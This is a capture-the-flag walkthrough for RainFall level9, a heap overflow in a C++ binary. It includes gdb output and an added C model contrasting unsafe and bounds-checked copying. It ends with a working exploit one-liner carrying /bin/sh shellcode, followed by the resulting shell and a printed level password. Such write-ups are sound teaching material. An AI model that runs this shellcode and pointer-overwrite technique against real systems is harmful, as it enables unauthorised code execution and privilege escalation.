RainFall/level9/Ressources/walkthrough.md

For the last level of the mandatory part, we notice there is a twist: the binary seems to be compiled from C++ code. We don't see any shell spawn or password read in it, so we are going to use a shellcode.

Let's try to make the program segfault with 'A's: it segfaults from 109 bytes on. If we run it in gdb with 112 bytes, with 'B's at the end, we get this segfault:

```
(gdb) i r
eax            0x42424242       1111638594
ecx            0x42424242       1111638594
edx            0x804a07c        134520956
ebx            0x804a078        134520952
esp            0xbffff6a0       0xbffff6a0
ebp            0xbffff6c8       0xbffff6c8
esi            0x0      0
edi            0x0      0
eip            0x8048682        0x8048682 <main+142>
eflags         0x210287 [ CF PF SF IF RF ID ]
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51
(gdb) x/i $eip
=> 0x8048682 <main+142>:        mov    (%eax),%edx
(gdb)
```

Later in the code, we find this:

```
0x8048693 <main+159> call *%edx
```

That means the pointer read from bytes 109-112 of our input is dereferenced, and the value found there is called. So we can put the address we want to jump to anywhere in the string, and write the address of that spot at bytes 109-112.

We will point it at our shellcode.
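To see the bug class behind this level from the defender's side, here is an added C model (not the level9 source, and not code from the RainFall project) of the pattern observed in gdb: a fixed-size text buffer sitting right before a pointer that the program later dereferences and calls. The struct, the field names, `TEXT_SIZE` and the probe helpers are assumptions chosen for the illustration. It contrasts an unbounded copy, which lets a long input overwrite the pointer, with a bounds-checked setter that rejects oversized input and keeps the pointer intact.

```c
#define _POSIX_C_SOURCE 200809L   /* for strnlen */
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed model (assumption, not the level9 layout): a heap object with
 * a fixed-size text buffer immediately followed by a function pointer that
 * is later dereferenced and called, like the mov (%eax),%edx / call *%edx
 * pair seen in gdb. */
#define TEXT_SIZE 100

struct note {
    char text[TEXT_SIZE];
    void (*handler)(const struct note *);  /* lands right after the buffer */
};

static void default_handler(const struct note *n) {
    /* %.*s bounds the read so an unterminated buffer is still safe to print */
    printf("note: %.*s\n", TEXT_SIZE, n->text);
}

/* Unsafe setter: copies until the source's NUL with no bound on the
 * destination, so an input longer than TEXT_SIZE runs into handler. */
static void set_text_unsafe(struct note *n, const char *src) {
    char *dst = n->text;
    while (*src != '\0') {
        *dst++ = *src++;
    }
}

/* Hardened setter: the length check itself is bounded (strnlen never
 * reads past TEXT_SIZE), input that does not fit together with its
 * terminator is rejected, and the result is always NUL-terminated.
 * Returns 0 on success, -1 if the input was rejected and nothing written. */
static int set_text_checked(struct note *n, const char *src) {
    size_t len = strnlen(src, TEXT_SIZE);
    if (len >= TEXT_SIZE) {
        return -1;
    }
    memcpy(n->text, src, len);
    n->text[len] = '\0';
    return 0;
}

/* 1 if the pointer that will later be called is still what we set.
 * The volatile read keeps the compiler from assuming the out-of-bounds
 * write in the unsafe path could not have reached handler. */
static int handler_intact(const struct note *n) {
    void (*volatile const *p)(const struct note *) = &n->handler;
    return *p == default_handler;
}

/* Build a constructed input of `len` 'A' bytes (like the walkthrough's
 * probe) and a fresh note with a known handler. Returns 0 on failure. */
static int setup(char *input, size_t cap, size_t len, struct note **out) {
    if (len >= cap) return 0;
    memset(input, 'A', len);
    input[len] = '\0';
    *out = malloc(sizeof **out);
    if (*out == NULL) return 0;
    (*out)->handler = default_handler;
    return 1;
}

/* Unsafe path: returns 1 if handler survived, 0 if it was overwritten. */
static int probe_unsafe(size_t len) {
    char input[4096];
    struct note *n;
    int intact;
    if (!setup(input, sizeof input, len, &n)) return -2;
    set_text_unsafe(n, input);
    intact = handler_intact(n);   /* never call n->handler here */
    free(n);
    return intact;
}

/* Checked path: returns -1 if the input was rejected, 1 if it was accepted
 * and handler is intact, 0 if it was accepted but handler was clobbered. */
static int probe_checked(size_t len) {
    char input[4096];
    struct note *n;
    int rc;
    if (!setup(input, sizeof input, len, &n)) return -2;
    rc = set_text_checked(n, input);
    if (rc == 0) {
        rc = handler_intact(n);
        if (rc == 1) n->handler(n);   /* safe: pointer is untouched */
    }
    free(n);
    return rc;
}

int main(void) {
    printf("unsafe, 50 bytes: handler intact = %d\n", probe_unsafe(50));
    printf("unsafe, %zu bytes: handler intact = %d\n",
           sizeof(struct note), probe_unsafe(sizeof(struct note)));
    printf("checked, 50 bytes: %d\n", probe_checked(50));
    printf("checked, %zu bytes: %d\n",
           sizeof(struct note), probe_checked(sizeof(struct note)));
    return 0;
}
```

With an input as long as the whole object, the unsafe setter silently replaces the pointer with 0x41 bytes, which is exactly the state the gdb dump above shows (eax full of 'B's); the checked setter refuses the same input before touching the object, so the later indirect call still reaches the intended function.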

```
level9@RainFall:~$ ./level9  `python -c "print('\x10\xa0\x04\x08'+'\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68'+'A'*58+'\x0c\xa0\x04\x08')"`
$ whoami
bonus0
$ cat /home/user/bonus0/.pass
f3f0004b6f364cb5a4147e9ef827fa922a4861408845c26b6971ad770d906728
```

:)